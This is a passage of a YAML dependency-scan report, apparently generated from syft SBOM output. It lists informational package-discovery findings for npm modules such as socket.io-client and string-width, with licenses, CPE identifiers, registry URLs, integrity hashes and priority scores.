is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a08d32cd24a38070
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: socket.io-adapter 2.5.6'
|
|
title: socket.io-adapter 2.5.6
|
|
description: 'Package discovered: socket.io-adapter 2.5.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 423a38d81e2dc8e3
|
|
name: socket.io-adapter
|
|
version: 2.5.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket.io-adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io-adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io_adapter:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io_adapter:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io:socket.io-adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io:socket.io_adapter:2.5.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/socket.io-adapter@2.5.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.5.6.tgz
|
|
integrity: sha512-DkkO/dz7MGln0dHn5bmN3pPy+JmywNICWrJqVWiVOyvXjWQFIv9c2h24JrQLLFJ2aQVQf/Cvl1vblnd4r2apLQ==
|
|
dependencies:
|
|
debug: ~4.4.1
|
|
ws: ~8.18.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 126bbc6e6f7db2d9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: socket.io-client 4.8.3'
|
|
title: socket.io-client 4.8.3
|
|
description: 'Package discovered: socket.io-client 4.8.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ecd3152d103ea0f9
|
|
name: socket.io-client
|
|
version: 4.8.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket.io-client:socket.io-client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io-client:socket.io_client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io_client:socket.io-client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io_client:socket.io_client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io:socket.io-client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:socket.io:socket.io_client:4.8.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/socket.io-client@4.8.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/socket.io-client/-/socket.io-client-4.8.3.tgz
|
|
integrity: sha512-uP0bpjWrjQmUt5DTHq9RuoCBdFJF10cdX9X+a368j/Ft0wmaVgxlrjvK3kjvgCODOMMOz9lcaRzxmso0bTWZ/g==
|
|
dependencies:
|
|
'@socket.io/component-emitter': ~3.1.0
|
|
debug: ~4.4.1
|
|
engine.io-client: ~6.6.1
|
|
socket.io-parser: ~4.2.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4e07aea60237064a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: socket.io-parser 4.2.6'
|
|
title: socket.io-parser 4.2.6
|
|
description: 'Package discovered: socket.io-parser 4.2.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f9190921d6308e46
|
|
name: socket.io-parser
|
|
version: 4.2.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket:socket.io-parser:4.2.6:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/socket.io-parser@4.2.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/socket.io-parser/-/socket.io-parser-4.2.6.tgz
|
|
integrity: sha512-asJqbVBDsBCJx0pTqw3WfesSY0iRX+2xzWEWzrpcH7L6fLzrhyF8WPI8UaeM4YCuDfpwA/cgsdugMsmtz8EJeg==
|
|
dependencies:
|
|
'@socket.io/component-emitter': ~3.1.0
|
|
debug: ~4.4.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1381d8de85a9f426
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: source-map-js 1.2.1'
|
|
title: source-map-js 1.2.1
|
|
description: 'Package discovered: source-map-js 1.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ef14348a3e7aef73
|
|
name: source-map-js
|
|
version: 1.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:source-map-js:source-map-js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source-map-js:source_map_js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source_map_js:source-map-js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source_map_js:source_map_js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source-map:source-map-js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source-map:source_map_js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source_map:source-map-js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source_map:source_map_js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source:source-map-js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:source:source_map_js:1.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/source-map-js@1.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz
|
|
integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8a8949f600357d51
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: standard-as-callback 2.1.0'
|
|
title: standard-as-callback 2.1.0
|
|
description: 'Package discovered: standard-as-callback 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ae42b44f62499323
|
|
name: standard-as-callback
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:standard-as-callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard-as-callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard_as_callback:standard-as-callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard_as_callback:standard_as_callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard-as:standard-as-callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard-as:standard_as_callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard_as:standard-as-callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard_as:standard_as_callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard:standard-as-callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:standard:standard_as_callback:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/standard-as-callback@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz
|
|
integrity: sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4830d30cd7a05603
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: statuses 2.0.2'
|
|
title: statuses 2.0.2
|
|
description: 'Package discovered: statuses 2.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7442cb30a409bd68
|
|
name: statuses
|
|
version: 2.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:statuses:statuses:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/statuses@2.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/statuses/-/statuses-2.0.2.tgz
|
|
integrity: sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fce9dfc2e720150a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: stdlib go1.20.12'
|
|
title: stdlib go1.20.12
|
|
description: 'Package discovered: stdlib go1.20.12'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 755a3e00c5f656c9
|
|
name: stdlib
|
|
version: go1.20.12
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
accessPath: /node_modules/@esbuild/darwin-arm64/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/stdlib@1.20.12
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goCompiledVersion: go1.20.12
|
|
architecture: ''
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 684726e125b93b59
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /node_modules/esbuild/bin/esbuild
|
|
startLine: 0
|
|
message: 'Package discovered: stdlib go1.20.12'
|
|
title: stdlib go1.20.12
|
|
description: 'Package discovered: stdlib go1.20.12'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e9a4a6eb4de31a0f
|
|
name: stdlib
|
|
version: go1.20.12
|
|
type: go-module
|
|
foundBy: go-module-binary-cataloger
|
|
locations:
|
|
- path: /node_modules/esbuild/bin/esbuild
|
|
accessPath: /node_modules/esbuild/bin/esbuild
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-3-Clause
|
|
spdxExpression: BSD-3-Clause
|
|
type: declared
|
|
urls: []
|
|
locations: []
|
|
language: go
|
|
cpes:
|
|
- cpe: cpe:2.3:a:golang:go:1.20.12:-:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:golang/stdlib@1.20.12
|
|
metadataType: go-module-buildinfo-entry
|
|
metadata:
|
|
goCompiledVersion: go1.20.12
|
|
architecture: ''
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 12c7b9072b4ac0c3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: stream-events 1.0.5'
|
|
title: stream-events 1.0.5
|
|
description: 'Package discovered: stream-events 1.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d6075f31d1f26f1b
|
|
name: stream-events
|
|
version: 1.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:stream-events:stream-events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream-events:stream_events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream_events:stream-events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream_events:stream_events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream:stream-events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream:stream_events:1.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/stream-events@1.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz
|
|
integrity: sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==
|
|
dependencies:
|
|
stubs: ^3.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 42a667b9f8ef2c86
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: stream-shift 1.0.3'
|
|
title: stream-shift 1.0.3
|
|
description: 'Package discovered: stream-shift 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1acff9076c855611
|
|
name: stream-shift
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:stream-shift:stream-shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream-shift:stream_shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream_shift:stream-shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream_shift:stream_shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream:stream-shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:stream:stream_shift:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/stream-shift@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz
|
|
integrity: sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 89e93178704235e4
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: streamsearch 1.1.0'
|
|
title: streamsearch 1.1.0
|
|
description: 'Package discovered: streamsearch 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c7163598759ab751
|
|
name: streamsearch
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:streamsearch:streamsearch:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/streamsearch@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz
|
|
integrity: sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d28f82c740f787aa
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: string-width 4.2.3'
|
|
title: string-width 4.2.3
|
|
description: 'Package discovered: string-width 4.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6c7ed5b8c0bd71e8
|
|
name: string-width
|
|
version: 4.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:string-width:string-width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string-width:string_width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_width:string-width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string_width:string_width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string-width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:string:string_width:4.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/string-width@4.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz
|
|
